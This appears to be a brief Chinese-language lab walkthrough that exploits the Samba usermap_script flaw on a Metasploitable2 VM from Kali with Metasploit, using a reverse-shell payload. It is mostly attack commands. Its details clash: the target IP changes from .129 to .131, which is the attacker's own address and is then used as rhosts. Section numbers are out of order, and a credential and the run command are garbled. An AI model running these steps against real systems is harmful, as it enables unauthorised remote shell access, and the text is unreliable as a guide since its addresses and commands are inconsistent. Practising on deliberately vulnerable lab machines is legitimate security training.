靶机IP:192.168.126.129
测试机系统:kali、Metasploitable2靶机
测试机IP:192.168.126.131
一、环境搭建
1、下载并导入靶机
2、 查看网络适配器
靶机网络模式为NAT模式
三、 启动靶机
登录用户名为:adminmsf;adminmsf
发现靶机ip:192.168.126.131
二、漏洞利用
kali开启msf
msfconsole
选择漏洞库
use exploit/multi/samba/usermap_script
设置payload
set payload cmd/unix/reverse
设置参数,开始攻击
show options
set rhosts 192.168.126.131
run/expliot
利用成功,执行验证